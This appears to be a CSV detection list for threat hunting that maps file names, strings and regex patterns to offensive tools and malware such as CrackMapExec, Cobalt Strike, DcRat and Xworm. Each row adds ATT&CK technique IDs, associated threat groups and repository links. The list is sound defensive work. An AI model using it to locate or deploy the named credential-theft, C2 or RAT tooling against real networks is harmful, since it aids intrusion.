"*cme*-windows-latest-*",".{0,1000}cme.{0,1000}\-windows\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38504"
"*cme/cme.conf*",".{0,1000}cme\/cme\.conf.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38505"
"*cme_bloodhound_output_*.txt*",".{0,1000}cme_bloodhound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38506"
"*cme_dfscoerce_output_*.txt*",".{0,1000}cme_dfscoerce_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38507"
"*cme_get-desc-users_pass_output_*",".{0,1000}cme_get\-desc\-users_pass_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38508"
"*cme_get-desc-users_pass_results*",".{0,1000}cme_get\-desc\-users_pass_results.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38509"
"*cme_gpp_output_*.txt*",".{0,1000}cme_gpp_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38510"
"*cme_ldap-checker_output_*",".{0,1000}cme_ldap\-checker_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38511"
"*cme_MachineAccountQuota_output_*",".{0,1000}cme_MachineAccountQuota_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38512"
"*cme_ms17-010_output_*",".{0,1000}cme_ms17\-010_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38513"
"*cme_mssql_priv_output_*.txt*",".{0,1000}cme_mssql_priv_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38514"
"*cme_ntlmv1_output_*",".{0,1000}cme_ntlmv1_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38515"
"*cme_passpol_output_*.txt*",".{0,1000}cme_passpol_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38516"
"*cme_petitpotam_output_*.txt*",".{0,1000}cme_petitpotam_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38517"
"*cme_printnightmare_output_*.txt*",".{0,1000}cme_printnightmare_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38518"
"*cme_runasppl_output_*.txt*",".{0,1000}cme_runasppl_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38519"
"*cme_shadowcoerce_output_*.txt*",".{0,1000}cme_shadowcoerce_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38520"
"*cme_smb_enum*",".{0,1000}cme_smb_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38521"
"*cme_smbsigning_output_*.txt*",".{0,1000}cme_smbsigning_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38522"
"*cme_subnets_output_*.txt*",".{0,1000}cme_subnets_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38523"
"*cme_trusted-for-delegation_output_*",".{0,1000}cme_trusted\-for\-delegation_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38524"
"*cme_users_auth_ldap_*.txt*",".{0,1000}cme_users_auth_ldap_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38525"
"*cme_users_auth_smb_*.txt*",".{0,1000}cme_users_auth_smb_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38526"
"*cme_users_nullsess_smb_*.txt*",".{0,1000}cme_users_nullsess_smb_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38527"
"*cme_webdav_output_*.txt*",".{0,1000}cme_webdav_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38528"
"*cme_zerologon_output_*.txt*",".{0,1000}cme_zerologon_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38529"
"*cme-macOS-latest-*.zip*",".{0,1000}cme\-macOS\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38530"
"*cme-ubuntu-latest-*.zip*",".{0,1000}cme\-ubuntu\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38531"
"*cme-windows-latest-*.zip*",".{0,1000}cme\-windows\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38532"
"*CMLoot.psm1*",".{0,1000}CMLoot\.psm1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","38533"
"*CMLoot-main*",".{0,1000}CMLoot\-main.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","38534"
"*cmpivot.py*",".{0,1000}cmpivot\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","38535"
"*cms400net_default_userpass*",".{0,1000}cms400net_default_userpass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38536"
"*Cmstp-Bypass.dll*",".{0,1000}Cmstp\-Bypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","38537"
"*Cmstp-Bypass.pdb*",".{0,1000}Cmstp\-Bypass\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","38538"
"*CmstpElevatedCOM*",".{0,1000}CmstpElevatedCOM.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","38539"
"*cmVmbGVjdGl2ZQ==*",".{0,1000}cmVmbGVjdGl2ZQ\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38540"
"*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*",".{0,1000}CN\=DcRat\sServer.{0,1000}OU\=qwqdanchun.{0,1000}O\=DcRat\sBy\sqwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","38541"
"*CN=PortSwigger*",".{0,1000}CN\=PortSwigger.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","38542"
"*CN=ShadowSpray*",".{0,1000}CN\=ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","38543"
"*cnotin/SplunkWhisperer2*",".{0,1000}cnotin\/SplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0004 - TA0003  - TA0008 - TA0011","N/A","N/A","C2","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","N/A","9","10","250","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z","38544"
"*Coalfire-Research/Slackor*",".{0,1000}Coalfire\-Research\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","38545"
"*Coalfire-Research/Slackor*",".{0,1000}Coalfire\-Research\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","38546"
"*Cobalt Strike external C2*",".{0,1000}Cobalt\sStrike\sexternal\sC2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","38547"
"*Cobalt Strike*",".{0,1000}Cobalt\sStrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38548"
"*cobaltclip.cna*",".{0,1000}cobaltclip\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","38549"
"*cobaltclip.exe*",".{0,1000}cobaltclip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 